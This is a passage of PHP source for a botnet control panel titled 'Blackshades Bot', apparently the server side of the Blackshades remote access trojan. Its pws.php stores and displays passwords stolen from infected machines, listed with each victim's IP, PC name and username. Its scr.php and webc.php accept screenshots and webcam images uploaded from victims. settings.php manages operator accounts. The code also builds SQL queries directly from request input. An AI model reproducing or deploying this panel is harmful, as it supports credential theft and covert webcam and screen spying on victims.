2017 $res = mysql_query("SELECT DISTINCT hst_lastdate FROM tbl_history ORDER BY hst_lastdate DESC");
2018 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)){
2019 echo "<option value='" . $row['hst_lastdate'] . "'" . ">" . $row['hst_lastdate'] . "</option>";
2020 }
2021 ?>
2022 </select>
2023 <input type="submit" name="btn_history" id="btn_history" value="Show"/>
2024 </div>
2025 </form>
2026</center>
2027<td width="20%">
2028<table width="480" style="border:1px solid #505050" align="center" cellspacing="0" cellpadding="1">
2029 <?php
2030 if(isset($_POST['btn_history']))
2031 {
2032 $res = mysql_query("SELECT DISTINCT hst_lastdate, COUNT(bot_hwid) FROM tbl_history WHERE hst_lastdate = '" . $_POST['history_date'] . "'");
2033 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
2034 echo "<tr>".
2035 "<td width='40%' class='tb_summary_cols'><img src='img/main/online.png' width='16' height='12'/> Active bots during " . $row['hst_lastdate'] . ":" . "</td>" .
2036 "<td width='60%' class='tb_summary_rows'>" . $row['COUNT(bot_hwid)'] . "</td>" .
2037 "</tr>";
2038 }
2039 echo "<tr>".
2040 "<td width='40%' class='tb_summary_cols'> </td>" .
2041 "<td width='60%' class='tb_summary_rows'> </td>" .
2042 "</tr>";
2043 mysql_free_result($res);
2044
2045 $res = mysql_query("SELECT DISTINCT bot_country, COUNT(tbl_history.bot_hwid) FROM tbl_history, tbl_bot WHERE hst_lastdate = '" . $_POST['history_date'] . "' AND tbl_bot.bot_hwid = tbl_history.bot_hwid GROUP BY bot_country");
2046 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
2047 echo "<tr>".
2048 "<td width='40%' class='tb_summary_cols'>" . "<img src='img/flags/" . strtoupper($row['bot_country']) . ".gif' width='16' height='11'/> " . $row['bot_country'] . ":" . "</td>" .
2049 "<td width='60%' class='tb_summary_rows'>" . $row['COUNT(tbl_history.bot_hwid)'] . "</td>" .
2050 "</tr>";
2051 }
2052 mysql_free_result($res);
2053 }
2054 ?>
2055</table>
2056==> pws.php <==
2057<?php
2058 error_reporting(0);
2059 include_once('db/database.inc.php');
2060 include_once('config.php');
2061
2062 session_start();
2063
2064 if(isset($_POST['key']) && isset($_POST['hwid']) && isset($_POST['data'])){
2065 if($_POST['key'] == $CFG_PASSWORD){ //Auth check
2066 date_default_timezone_set(date_default_timezone_get());
2067 $date = new DateTime("now");
2068
2069 $rows=explode("<br/>",$_POST['data']);
2070 foreach ($rows as $key => $value) {
2071 $tmp=explode("</dm>",$value);
2072 if(!empty($tmp["0"]) && !empty($tmp["1"]) && !empty($tmp["2"]) && !empty($tmp["1"])){
2073 $res = mysql_query("INSERT INTO tbl_pws (bot_hwid, pw_app, pw_host, pw_login, pw_password, pw_date, pw_datetime)
2074 VALUES ('" . $_POST['hwid'] . "', '" . $tmp["0"] . "', '" . $tmp["1"] . "', '" . $tmp["2"] . "', '" . $tmp["3"] . "', '" . $date->format('Y-m-d') . "', '" . $date->format('Y-m-d H:i:s') . "')");
2075 }
2076 }
2077 }else{ //Wrong password/key
2078 echo $CFG_ERROR_MSG;
2079 }
2080 exit;
2081 }
2082
2083 if (!$auth->verify()){ //If unauthorized
2084 Header("Location: index.php");
2085 exit;
2086 }
2087
2088 if(isset($_POST['btn_delete']))
2089 {
2090 //Check privileges
2091 if($_SESSION['privileges'] == '0'){
2092 echo $CFG_UNATHORIZED;
2093 exit;
2094 }
2095
2096 if($_POST['pws_date_del'] == "All"){ //Delete all logs
2097 $res = mysql_query("TRUNCATE TABLE tbl_pws");
2098 }else{ //Delete all logs within selected date
2099 $res = mysql_query("DELETE FROM tbl_pws WHERE pw_date = '{$_POST['pws_date_del']}'");
2100 }
2101 }
2102?>
2103
2104<html>
2105<header>
2106<style type="text/css">
2107body { margin:0px;padding:0px;background:#202020; color:#8e8e8e;font-family:Arial;font-size:12px}
2108table { color:#8e8e8e;font-family:Arial;font-size:12px}
2109a { color:#8e8e8e;text-decoration:none;}
2110input { border:0px; background: #6d6d6d;font-family:Arial;font-size:12px;color:#b2b2b2}
2111 <!--
2112 .tb_summary {
2113 text-align: center;
2114 font-weight: bold;
2115 }
2116 .tb_summary_cols {
2117 text-align: center;
2118 }
2119 .tb_summary_cols {
2120 text-align: left;
2121 }
2122 .tb_col_header {
2123 font-weight: bold;
2124 text-align: left;
2125 font-size:14px
2126 }
2127 .style_settings {
2128 font-size: 16px;
2129 font-weight: bold;
2130 }
2131 -->
2132</style>
2133
2134</header>
2135<table width="100%" style="background: #414140;height:60px;margin:0px;padding:0px;margin-top:-2px;font-family:Arial;font-size:23px;color:#8e8e8e"><tr><td style="text-align:center">Passwords
2136<?php include_once('header.php'); ?>
2137
2138<title>Blackshades Bot</title>
2139<br/><br/>
2140<center>
2141 <form id="form_pws" name="f_pws" method="post" action="">
2142 <div style="font-family:Arial;font-size:16px;color:#636363"><span class="tb_summary">Capture date:</span>
2143 <select name="pws_date" id="pws_date">
2144 <?php
2145 ob_start();
2146 $res = mysql_query("SELECT DISTINCT pw_date FROM tbl_pws ORDER BY pw_date DESC");
2147 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)){
2148 echo "<option value='" . $row['pw_date'] . "'" . ">" . $row['pw_date'] . "</option>";
2149 }
2150 echo "<option value='All'>All</option>";
2151 ob_flush();
2152 ?>
2153 </select> <img src="img/main/search.png" width="16" height="12"/><label>Search:</label>
2154 <label><input type="text" name="pws_search" id="pws_search"></label>
2155 <input type="submit" name="btn_pws" id="btn_pws" value="Show"/>
2156 </div>
2157 </form></center>
2158
2159<td width="20%">
2160<br/>
2161 <?php
2162 if(isset($_POST['btn_pws']) || isset($_GET['page']))
2163 {
2164 if($_POST['pws_date'] == "All"){ //Show all logs
2165 if(!empty($_POST['pws_search'])){ //Perform search on all logs
2166 $res = mysql_query("SELECT tbl_bot.bot_hwid, bot_wan, bot_pc_name, bot_pc_user, pw_app, pw_host, pw_login, pw_password FROM tbl_bot,tbl_pws WHERE tbl_bot.bot_hwid = tbl_pws.bot_hwid AND pw_host LIKE '%{$_POST['pws_search']}%' ORDER BY pw_app ASC");
2167 }else{ //No search
2168 $res = mysql_query("SELECT tbl_bot.bot_hwid, bot_wan, bot_pc_name, bot_pc_user, pw_app, pw_host, pw_login, pw_password FROM tbl_bot,tbl_pws WHERE tbl_bot.bot_hwid = tbl_pws.bot_hwid ORDER BY pw_app ASC");
2169 }
2170 }elseif(!empty($_POST['pws_search'])){ //Perform search on selected date
2171 $res = mysql_query("SELECT tbl_bot.bot_hwid, bot_wan, bot_pc_name, bot_pc_user, pw_app, pw_host, pw_login, pw_password FROM tbl_bot,tbl_pws WHERE tbl_bot.bot_hwid = tbl_pws.bot_hwid AND pw_date = '{$_POST['pws_date']}' AND pw_host LIKE '%{$_POST['pws_search']}%' ORDER BY pw_app ASC");
2172 }elseif(isset($_GET['page'])){
2173 $rows = mysql_num_rows(mysql_query("SELECT * FROM tbl_pws"));
2174 $pos = ($_GET['page'] * $PAGE_ROWS_LIMIT) - $PAGE_ROWS_LIMIT;
2175 $res = $res = mysql_query("SELECT tbl_bot.bot_hwid, bot_wan, bot_pc_name, bot_pc_user, pw_app, pw_host, pw_login, pw_password FROM tbl_bot,tbl_pws WHERE tbl_bot.bot_hwid = tbl_pws.bot_hwid ORDER BY pw_app ASC LIMIT $pos,$PAGE_ROWS_LIMIT");
2176 }else{ //No search
2177 $res = mysql_query("SELECT tbl_bot.bot_hwid, bot_wan, bot_pc_name, bot_pc_user, pw_app, pw_host, pw_login, pw_password FROM tbl_bot,tbl_pws WHERE tbl_bot.bot_hwid = tbl_pws.bot_hwid AND pw_date = '{$_POST['pws_date']}' ORDER BY pw_app ASC");
2178 }
2179
2180 echo "<table width='1280' style='border:1px solid #505050' align='center' cellspacing='0' cellpadding='1'>";
2181 echo "<th width='8%' class='tb_col_header'>" . "<img src='img/main/key.png' width='14' height='14'/> " . "HWID</th>" .
2182 "<th width='7%' class='tb_col_header'>" . "<img src='img/main/wan.png' width='14' height='14'/> " . "WAN</th>" .
2183 "<th width='10%' class='tb_col_header'>" . "<img src='img/main/pc.png' width='14' height='14'/> " . "PC Name</th>" .
2184 "<th width='10%' class='tb_col_header'>" . "<img src='img/main/username.png' width='14' height='14'/> " . "User name</th>" .
2185 "<th width='10%' class='tb_col_header'>" . "<img src='img/main/application.png' width='14' height='14'/> " . "Application</th>" .
2186 "<th width='25%' class='tb_col_header'>" . "<img src='img/main/host.png' width='14' height='14'/> " . "Host</th>" .
2187 "<th width='20%' class='tb_col_header'>" . "<img src='img/main/online.png' width='14' height='14'/> " . "Login</th>" .
2188 "<th width='15%' class='tb_col_header'>" . "<img src='img/main/key.png' width='14' height='14'/> " . "Password</th></tr>";
2189
2190 echo "<tr><td width='8%' class='tb_summary_cols'> </td>" .
2191 "<td width='10%' class='tb_summary_cols'> </td>" .
2192 "<td width='10%' class='tb_summary_cols'> </td>" .
2193 "<td width='10%' class='tb_summary_cols'> </td>" .
2194 "<td width='10%' class='tb_summary_cols'> </td>" .
2195 "<td width='25%' class='tb_summary_cols'> </td>" .
2196 "<td width='20%' class='tb_summary_cols'> </td>" .
2197 "<td width='15%' class='tb_summary_cols'> </td></tr>";
2198
2199 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
2200 echo "<tr><td width='8%' class='tb_summary_cols'>" . $row['bot_hwid'] . "</td>" .
2201 "<td width='7%' class='tb_summary_cols'>" . $row['bot_wan'] . "</td>" .
2202 "<td width='10%' class='tb_summary_cols'>" . $row['bot_pc_name'] . "</td>" .
2203 "<td width='10%' class='tb_summary_cols'>" . $row['bot_pc_user'] . "</td>" .
2204 "<td width='10%' class='tb_summary_cols'>" . $row['pw_app'] . "</td>" .
2205 "<td width='25%' class='tb_summary_cols'>" . $row['pw_host'] . "</td>" .
2206 "<td width='20%' class='tb_summary_cols'>" . $row['pw_login'] . "</td>" .
2207 "<td width='15%' class='tb_summary_cols'>" . $row['pw_password'] . "</td></tr>";
2208 }
2209 echo "</table>" . "<br/><br/>";
2210 mysql_free_result($res);
2211 }
2212
2213 $rows = mysql_result(mysql_query("SELECT COUNT(*) FROM tbl_pws"),0); //Get number of records
2214 $totpws = $rows;
2215 echo "<br/><center><div style='font-family:Arial;font-size:18px;color:#636363'><span class='tb_summary'>Page:</span> ";
2216 while($rows >= 0){
2217 $page++;
2218 if($page % 25 == 0)
2219 echo "<br/>";
2220
2221 if($rows >= $PAGE_ROWS_LIMIT){
2222 if($_GET['page'] == $page)
2223 echo "<span style='font-size:12px'><a href='pws.php?page={$page}'>$page</a></span> ";
2224 else
2225 echo "<a href='pws.php?page={$page}'>$page</a> ";
2226 }else{
2227 if($_GET['page'] == $page)
2228 echo "<span style='font-size:12px'><a href='pws.php?page={$page}'>$page</a></span> ";
2229 else
2230 echo "<a href='pws.php?page={$page}'>$page</a> ";
2231 }
2232 $rows -= $PAGE_ROWS_LIMIT;
2233 }
2234 echo "</div>";
2235 echo "<br/><div style='font-family:Arial;font-size:12px;color:#636363'><span class='tb_summary'>Total passwords: $totpws</span>";
2236 echo "</center>";
2237?>
2238 <br/><br/>
2239 <center><form name="f_delete" method="post" action="">
2240 <span style="font-family:Arial;font-size:16px;color:#636363"><img src="img/main/delete.png" width="15" height="13"/><span class="tb_summary">Passwords:</span>
2241 <select name="pws_date_del" id="pws_date_del">
2242 <?php
2243 ob_start();
2244 echo "<option value='None'>None</option>";
2245 $res = mysql_query("SELECT DISTINCT pw_date FROM tbl_pws ORDER BY pw_date DESC");
2246 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)){
2247 echo "<option value='" . $row['pw_date'] . "'" . ">" . $row['pw_date'] . "</option>";
2248 }
2249 echo "<option value='All'>Everything</option>";
2250 ob_flush();
2251 ?>
2252 </select> <input type="submit" name="btn_delete" id="btn_delete" value="Delete"/></span>
2253 </form></center>
2254==> scr.php <==
2255<?php
2256 error_reporting(0);
2257 include_once('db/database.inc.php');
2258 include_once('config.php');
2259
2260 session_start();
2261
2262 if(isset($_POST['key']) && isset($_FILES['uploadedfile']['name'])){
2263 if($_POST['key'] == $CFG_PASSWORD){ //Auth check
2264 move_uploaded_file($_FILES['uploadedfile']['tmp_name'], "screens/" . $_POST['hwid'] . ".jpg");
2265
2266 date_default_timezone_set(date_default_timezone_get());
2267 $date = new DateTime("now");
2268
2269 if(mysql_num_rows(mysql_query("SELECT bot_hwid FROM tbl_scr WHERE bot_hwid = '{$_POST['hwid']}'"))){
2270 $res = mysql_query("UPDATE tbl_scr SET scr_date = '{$date->format('Y-m-d')}', scr_datetime = '{$date->format('Y-m-d H:i:s')}' WHERE bot_hwid = '{$_POST['hwid']}'");
2271 }else{
2272 $res = mysql_query("INSERT INTO tbl_scr (bot_hwid, scr_date, scr_datetime)
2273 VALUES ('" . $_POST['hwid'] . "', '" . $date->format('Y-m-d') . "', '" . $date->format('Y-m-d H:i:s') . "')");
2274 }
2275 exit;
2276 }else{ //Wrong password/key
2277 echo $CFG_ERROR_MSG;
2278 exit;
2279 }
2280 }else{
2281 echo "Not set!";
2282 exit;
2283 }
2284
2285 if (!$auth->verify()){ //If unauthorized
2286 Header("Location: index.php");
2287 exit;
2288 }
2289?>
2290==> screens:index.php <==
2291<?php
2292 include_once('../config.php');
2293 echo $CFG_ERROR_MSG;
2294?>
2295==> settings.php <==
2296<?php
2297 include_once('db/database.inc.php');
2298 include_once('config.php');
2299
2300 if(isset($_GET['l'])){
2301 $auth->logout();
2302 }
2303
2304 if (!$auth->verify()){ //If unauthorized
2305 Header("Location: index.php");
2306 exit;
2307 }
2308
2309 //Add account
2310 if(isset($_POST['bt_addacc']) && !empty($_POST['tf_username']) && !empty($_POST['tf_password']) && isset($_POST['acc_type'])){
2311 //Check privileges
2312 if($_SESSION['privileges'] == '0'){
2313 echo $CFG_UNATHORIZED;
2314 exit;
2315 }
2316 $res = mysql_query("INSERT INTO tbl_account (acc_name, acc_pw, acc_type) VALUES ('" . $_POST['tf_username'] . "', '" . sha1($_POST['tf_password']) . "', '" . $_POST['acc_type'] . "')");
2317 }
2318?>
2319
2320<html>
2321<header>
2322<style type="text/css">
2323body { margin:0px;padding:0px;background:#202020; color:#8e8e8e;font-family:Arial;font-size:12px}
2324table { color:#8e8e8e;font-family:Arial;font-size:12px}
2325a { color:#8e8e8e;text-decoration:none;}
2326input { border:0px; background: #6d6d6d;font-family:Arial;font-size:12px;color:#b2b2b2}
2327 <!--
2328 .tb_summary {
2329 text-align: center;
2330 font-weight: bold;
2331 }
2332 .tb_summary_cols {
2333 text-align: center;
2334 }
2335 .tb_summary_cols {
2336 text-align: left;
2337 }
2338 .tb_col_header {
2339 font-weight: bold;
2340 text-align: left;
2341 font-size:14px
2342 }
2343 .style_settings {
2344 font-size: 16px;
2345 font-weight: bold;
2346 }
2347 div.img img
2348 {
2349 margin:3px;
2350 border:1px solid #202020;
2351 }
2352 div.img a:hover img
2353 {
2354 border:1px solid #0000ff;
2355 }
2356 -->
2357</style>
2358</header>
2359<table width="100%" style="background: #414140;height:60px;margin:0px;padding:0px;margin-top:-2px;font-family:Arial;font-size:23px;color:#8e8e8e"><tr><td style="text-align:center">Settings
2360<?php include_once('header.php'); ?>
2361
2362<title>Blackshades Bot</title>
2363
2364</br>
2365<div align='center' style="font-family:Arial;font-size:16px;color:#636363";>My account - <?php echo $_SESSION['username']?></div>
2366<table width='60%' style='border:1px solid #505050' align='center' cellspacing='0' cellpadding='1'>
2367<center>
2368 <tr>
2369 <td width='100%' align='center'>
2370 </br>
2371 <form name="f_changename" method="post" action="">
2372 <label><img src='img/main/name.png' width='14' height='14'/> New username:<input type="text" name="tf_username" id="tf_username"></label>
2373 <label> Confirm:<input type="text" name="tf_username_confirm" id="tf_username_confirm"></label>
2374 <input type="submit" name="bt_username" id="bt_username" value="Change">
2375 </form>
2376 </td>
2377 </tr>
2378 <tr>
2379 <td width='100%' align='center'>
2380 </br>
2381 <form name="f_changepw" method="post" action="">
2382 <label><img src='img/main/key.png' width='14' height='14'/> New password:<input type="text" name="tf_password" id="tf_password"></label>
2383 <label> Confirm:<input type="text" name="tf_password_confirm" id="tf_password_confirm"></label>
2384 <input type="submit" name="bt_password" id="bt_password" value="Change">
2385 </form>
2386 </td>
2387 </tr>
2388 </center>
2389</table>
2390
2391</br></br>
2392
2393<div align='center' style="font-family:Arial;font-size:16px;color:#636363";>All accounts</div>
2394<table width='60%' style='border:1px solid #505050' align='center' cellspacing='0' cellpadding='1'>
2395 <?php
2396 include_once('config.php');
2397
2398 if(isset($_GET['l'])){
2399 $auth->logout();
2400 }
2401
2402 if (!$auth->verify()){ //If unauthorized
2403 Header("Location: index.php");
2404 exit;
2405 }
2406
2407 if(isset($_GET['accdel'])) //Delete command
2408 {
2409 //Check privileges
2410 if($_SESSION['privileges'] == '1'){
2411 $res = mysql_query("DELETE FROM tbl_account WHERE acc_id = {$_GET['accdel']}");
2412 }
2413 }
2414
2415 $res = mysql_query("SELECT acc_id, acc_name, acc_type, acc_lastip, acc_lastlogon FROM tbl_account WHERE NOT acc_name = '{$_SESSION["username"]}'");
2416 echo "<tr><th width='20%' class='tb_col_header'>" . "<img src='img/main/name.png' width='14' height='14'/> " . "Name</th>" .
2417 "<th width='25%' class='tb_col_header'>" . "<img src='img/main/username.png' width='14' height='14'/> " . "Privileges</th>" .
2418 "<th width='30%' class='tb_col_header'>" . "<img src='img/main/wan.png' width='14' height='14'/> " . "Last IP</th>" .
2419 "<th width='30%' class='tb_col_header'>" . "<img src='img/main/seen.png' width='14' height='14'/> " . "Last login</th>" .
2420 "<th width='5%' class='tb_col_header'>" . " " . "</th></tr>";
2421
2422 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
2423 if($row['acc_type'] == '0')
2424 $priv = "Guest";
2425 else
2426 $priv = "Administrator";
2427 echo "<tr><td width='20%' class='tb_summary_cols'> </td>" .
2428 "<td width='25%' class='tb_summary_cols'> </td>" .
2429 "<td width='30%' class='tb_summary_cols'> </td>" .
2430 "<td width='30%' class='tb_summary_cols'> </td>" .
2431 "<td width='5%' class='tb_summary_cols'> </td></tr>";
2432
2433 echo "<tr><td width='20%' class='tb_summary_cols'>" . $row['acc_name'] . "</td>" .
2434 "<td width='25%' class='tb_summary_cols'>" . "<img src='img/main/" . strtolower($priv) . ".png' width='14' height='14'/> " . $priv . "</td>" .
2435 "<td width='30%' class='tb_summary_cols'>" . $row['acc_lastip'] . "</td>" .
2436 "<td width='30%' class='tb_summary_cols'>" . $row['acc_lastlogon'] . "</td>" .
2437 "<td width='5%' class='tb_summary_cols'>" . "<div class='img'><a href='settings.php?accdel={$row['acc_id']}'><img src='img/main/remove.png' width='16' height='16'/></a></div></td></tr>";
2438 }
2439 ?>
2440</table>
2441</br></br>
2442<div align='center' style="font-family:Arial;font-size:16px;color:#636363";>Add account</div>
2443<table width='60%' style='border:1px solid #505050' align='center' cellspacing='0' cellpadding='1'>
2444 <center>
2445 <tr><td width='100%' align='center'> </td></tr>
2446 <tr>
2447 <td width='100%' align='center'>
2448 <form name="f_addacc" method="post" action="">
2449 <label><img src='img/main/name.png' width='14' height='14'/> Username:<input type="text" name="tf_username" id="tf_username"></label>
2450 <label> <img src='img/main/key.png' width='14' height='14'/> Password:<input type="text" name="tf_password" id="tf_password"></label>
2451 <label> <img src='img/main/username.png' width='14' height='14'/> Privileges:</label><select name="acc_type" id="acc_type">
2452 <option value='1'>Administrator</option>
2453 <option value='0'>Guest</option>
2454 </select>
2455 <input type="submit" name="bt_addacc" id="bt_addacc" value="Add account">
2456 </form>
2457 </td>
2458 </tr>
2459 </center>
2460</table>
2461
2462<?php
2463 //Change account name
2464 if(isset($_POST['bt_username']) && !empty($_POST['tf_username']) && !empty($_POST['tf_username_confirm']) && !empty($_POST['tf_username'])){
2465 if($_POST['tf_username'] == $_POST['tf_username_confirm']){ //Username match
2466 $res = mysql_query("UPDATE tbl_account SET acc_name = '{$_POST['tf_username']}' WHERE acc_name = '{$_SESSION["username"]}'");
2467 if(mysql_affected_rows() == 1)
2468 echo "<center><h3>Account name successfully changed!</h3></center>";
2469 else
2470 echo "<center><h3>Error: Couldn't change account name!</h3></center>";
2471 }else{
2472 echo "<center><h3>Error: Confirmation account name mismatch!</h3></center>";
2473 }
2474 }
2475
2476 //Change account password
2477 if(isset($_POST['bt_password']) && !empty($_POST['tf_password']) && !empty($_POST['tf_password_confirm']) && !empty($_POST['tf_password'])){
2478 if($_POST['tf_password'] == $_POST['tf_password_confirm']){ //Passwords match
2479 $res = mysql_query("UPDATE tbl_account SET acc_pw = '". sha1($_POST['tf_password']) . "' WHERE acc_name = '{$_SESSION["username"]}'");
2480 if(mysql_affected_rows() == 1)
2481 echo "<center><h3>Passowrd successfully changed!</h3></center>";
2482 else
2483 echo "<center><h3>Error: Account name not found!</h3></center>";
2484 }else{ //Passwords mismatch
2485 echo "<center><h3>Error: Confirmation password mismatch!</h3></center>";
2486 }
2487 }
2488?>
2489==> webc.php <==
2490<?php
2491 error_reporting(0);
2492 include_once('db/database.inc.php');
2493 include_once('config.php');
2494
2495 session_start();
2496
2497 if(isset($_POST['key']) && isset($_FILES['uploadedfile']['name'])){
2498 if($_POST['key'] == $CFG_PASSWORD){ //Auth check
2499 move_uploaded_file($_FILES['uploadedfile']['tmp_name'], "webcam/" . $_POST['hwid'] . ".jpg");
2500
2501 date_default_timezone_set(date_default_timezone_get());
2502 $date = new DateTime("now");
2503
2504 if(mysql_num_rows(mysql_query("SELECT bot_hwid FROM tbl_webc WHERE bot_hwid = '{$_POST['hwid']}'"))){
2505 $res = mysql_query("UPDATE tbl_webc SET webc_date = '{$date->format('Y-m-d')}', webc_datetime = '{$date->format('Y-m-d H:i:s')}' WHERE bot_hwid = '{$_POST['hwid']}'");
2506 }else{
2507 $res = mysql_query("INSERT INTO tbl_webc (bot_hwid, webc_date, webc_datetime)
2508 VALUES ('" . $_POST['hwid'] . "', '" . $date->format('Y-m-d') . "', '" . $date->format('Y-m-d H:i:s') . "')");
2509 }
2510 exit;
2511 }else{ //Wrong password/key
2512 echo $CFG_ERROR_MSG;
2513 exit;
2514 }
2515 }else{
2516 echo "Not set!";
2517 exit;
2518 }
2519
2520 if (!$auth->verify()){ //If unauthorized
2521 Header("Location: index.php");
2522 exit;
2523 }
2524?>
2525
2526<style type="text/css">
2527body { margin:0px;padding:0px;background:#202020 }
2528table { color:#8e8e8e;font-family:Arial;font-size:12px}
2529a { color:#8e8e8e;text-decoration:none;}
2530 <!--
2531 .tb_summary {
2532 text-align: center;
2533 font-weight: bold;
2534 }
2535 .tb_details_cols {
2536 font-weight: bold;
2537 text-align: right;
2538 }
2539 .tb_details_rows {
2540 text-align: center;
2541 }
2542 .tb_summary_cols {
2543 text-align: center;
2544 }
2545 .tb_summary_cols {
2546 text-align: right;
2547 }
2548 .tb_summary_rows {
2549 text-align: center;
2550 }
2551 -->
2552</style>
2553<table width="100%" style="background: #414140;height:60px;margin:0px;padding:0px;margin-top:-2px;font-family:Arial;font-size:23px;color:#8e8e8e"><tr><td style="text-align:center">Main
2554<?php include_once('header.php'); ?>
2555<title>Blackshades Bot</title>
2556<br>
2557<center><div style="font-family:Arial;font-size:16px;color:#636363">Welcome, <?php echo $_SESSION['username']; ?></div></center>
2558<br />
2559<tr>
2560<center><div style="font-family:Arial;font-size:16px;color:#636363"><span class="tb_summary">Overall statistics</span> <img src="img/main/history.png" width="16" height="16"/></div></center>
2561<td width="20%">
2562<table width="50%" style="border:1px solid #505050" align="center" cellspacing="0" cellpadding="1">
2563 <tr>
2564 <td width="40%" class="tb_details_cols"><img src="img/main/total.png" width="16" height="12"/> Total bots in record:</td>
2565 <td width="60%" class="tb_details_rows"><?php echo $acc->bots_total(); ?></td>
2566 </tr>
2567 <tr>
2568 <td class="tb_details_cols"><img src="img/main/online.png" width="16" height="12"/> Total bots online:</td>
2569 <td class="tb_details_rows"><?php echo $acc->bots_online(); ?></td>
2570 </tr>
2571 <tr>
2572 <td class="tb_details_cols"> </td>
2573 <td class="tb_details_rows"> </td>
2574 </tr>
2575 <tr>
2576 <td class="tb_details_cols"><img src="img/main/ip.png" width="16" height="12"/> Last IP:</td>
2577 <td class="tb_details_rows"><?php echo $acc->last_ip_get(); ?></td>
2578 </tr>
2579 <tr>
2580 <td class="tb_details_cols"><img src="img/main/lastlogin.png" width="16" height="12"/> Last logged in:</td>
2581 <td class="tb_details_rows"><?php echo $acc->last_logon(); ?></td>
2582 </tr>
2583</table>
2584<p><br />
2585</p></td>
2586
2587<center><div style="font-family:Arial;font-size:16px;color:#636363"><span class="tb_summary">Total country statistics</span> <img src="img/main/country.png" width="16" height="16"/></div></center>
2588<td width="20%">
2589<table width="50%" style="border:1px solid #505050" align="center" cellspacing="0" cellpadding="1">
2590 <?php
2591 $res = mysql_query("SELECT bot_country, COUNT(bot_id) FROM tbl_bot GROUP BY bot_country");
2592 echo "<tr><th width='40%' class='tb_summary_cols'>" . "<img src='img/main/country.png' width='14' height='14'/> " . "Country</th>" .
2593 "<th width='60%' class='tb_summary_rows'>" . "<img src='img/main/history.png' width='14' height='14'/> " . "Total</th>";
2594
2595 echo "<tr><td width='40%' class='tb_summary_cols'> </td>" .
2596 "<td width='60%' class='tb_summary_rows'> </td></tr>";
2597
2598 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
2599 echo "<tr>".
2600 "<td width='40%' class='tb_summary_cols'>" . "<img src='img/flags/" . strtoupper($row['bot_country']) . ".gif' width='16' height='11'/> " . $row['bot_country'] . ":" . "</td>" .
2601 "<td width='60%' class='tb_summary_rows'>" . $row['COUNT(bot_id)'] . "</td>" .
2602 "</tr>";
2603 }
2604 mysql_free_result($res);
2605 ?>
2606</table>
2607<br /><br />
2608<center>
2609 <form id="from_history" name="f_history" method="post" action="">
2610 <div style="font-family:Arial;font-size:16px;color:#636363"><span class="tb_summary"><img src="img/main/date.png" width="15" height="15"/>Statistics by date</span>
2611 <select name="history_date" id="history_date">
2612 <?php
2613 $res = mysql_query("SELECT DISTINCT hst_lastdate FROM tbl_history ORDER BY hst_lastdate DESC");
2614 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)){
2615 echo "<option value='" . $row['hst_lastdate'] . "'" . ">" . $row['hst_lastdate'] . "</option>";
2616 }
2617 ?>
2618 </select>
2619 <input type="submit" name="btn_history" id="btn_history" value="Show"/>
2620 </div>
2621 </form>
2622</center>
2623<td width="20%">
2624<table width="50%" style="border:1px solid #505050" align="center" cellspacing="0" cellpadding="1">
2625 <?php
2626 if(isset($_POST['btn_history']))
2627 {
2628 $res = mysql_query("SELECT DISTINCT hst_lastdate, COUNT(bot_hwid) FROM tbl_history WHERE hst_lastdate = '" . $_POST['history_date'] . "'");
2629 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
2630 echo "<tr>".
2631 "<td width='40%' class='tb_summary_cols'><img src='img/main/online.png' width='16' height='12'/> Active bots during " . $row['hst_lastdate'] . ":" . "</td>" .
2632 "<td width='60%' class='tb_summary_rows'>" . $row['COUNT(bot_hwid)'] . "</td>" .
2633 "</tr>";
2634 }
2635 echo "<tr>".
2636 "<td width='40%' class='tb_summary_cols'> </td>" .
2637 "<td width='60%' class='tb_summary_rows'> </td>" .
2638 "</tr>";
2639 mysql_free_result($res);
2640
2641 $res = mysql_query("SELECT DISTINCT bot_country, COUNT(tbl_history.bot_hwid) FROM tbl_history, tbl_bot WHERE hst_lastdate = '" . $_POST['history_date'] . "' AND tbl_bot.bot_hwid = tbl_history.bot_hwid GROUP BY bot_country");
2642 while ($row = mysql_fetch_array($res, MYSQL_ASSOC)) {
2643 echo "<tr>".
2644 "<td width='40%' class='tb_summary_cols'>" . "<img src='img/flags/" . strtoupper($row['bot_country']) . ".gif' width='16' height='11'/> " . $row['bot_country'] . ":" . "</td>" .
2645 "<td width='60%' class='tb_summary_rows'>" . $row['COUNT(tbl_history.bot_hwid)'] . "</td>" .
2646 "</tr>";
2647 }
2648 mysql_free_result($res);
2649 }
2650 ?>
2651</table>
2652==> webcam:index.php <==
2653<?php
2654 include_once('../config.php');
2655 echo $CFG_ERROR_MSG;
2656?>